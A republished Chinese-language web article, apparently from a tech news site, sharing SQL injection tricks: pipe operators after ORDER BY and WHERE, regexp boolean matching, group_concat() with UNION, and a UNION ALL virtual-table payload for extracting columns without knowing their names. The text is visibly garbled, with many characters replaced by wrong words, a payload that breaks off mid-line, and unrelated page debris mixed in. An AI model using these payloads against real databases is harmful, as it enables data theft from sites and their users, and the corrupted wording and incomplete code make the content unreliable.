作家
登录

关于SQL注入的一些技巧分享

作者: 来源: 2017-09-20 17:02:42 阅读 我要评论

  • |    2 | b       | s       | s       | ddd                  |    
  • |    3 | c       | s       | s       | wwwwwwww             |    
  • |    4 | d       | s       | s       | fffffff              |    
  • |    1 | 5.5.53  | 3       | 1,2,3   | 5                    |    
  • +------+---------+---------+---------+----------------------+    
  • rows in set (0.03 sec)  
  • 而test_table内的数据构造是如许的:

    1. +------------+ | test_table | 
    2.  
    3. +------------+ | 1 | 
    4.  
    5. | 2 | 
    6.  
    7. | 3 | 
    8.  
    9. +------------+  

    就说说union:

    很明显与learning_test表的字段数不合,然则我们应用了group_concat()函数拼接了我们须要的内容。

    0x01 管道符的应用

    1、order by之后可以应用|数字使排序错乱,不清跋扈具体是怎么错乱的

    2、where子句之后跟上|1或|0也能出数据,但如果跟上|大年夜于一或小于零的数就出不了数据

    0x02 regexp的应用

    很简单,正则匹配,匹配对象必须是单行单列,或者说是字符串。根本语法:

    1. ... where ... union all select * from((select 1)a join(select F.[须要萌芽的字段号] from(select * from [须要萌芽的表有若干个字段就join若干个] union select * from [须要萌芽的表] [limit子句])F)b[还差若干字段就再join若干个,以知足字段数雷同的原则]) 

    select (select语句) regexp '正则'

    意思是将括号内的萌芽的结不雅集测验测验与给出的┞俘则匹配,如不雅配对成功则返回1,配对掉败返回0。

    0x03 group_concat()的应用

    将一列数据进行拼接,异常便利的函数,一般与union一路应用,就像本节的第一末节给出的最后一个例子一样。

    0x04 应用虚拟表在不知道字段名的情况下出数据

    1. -1 UNION ALL    SELECT * FROM (    
    2.     (SELECT 1)a JOIN (    
    3.         SELECT F.4 from

        推荐阅读

        智能建筑中弱电智能化系统的设计分析

      【沙龙】51CTO诚邀您9月23号和多位技巧大年夜咖一路聊智能CDN的优化之路,抓紧时光哦! 一、弱电智能化的内涵在>>>详细阅读


      本文标题:关于SQL注入的一些技巧分享

      地址:http://www.17bianji.com/lsqh/37551.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)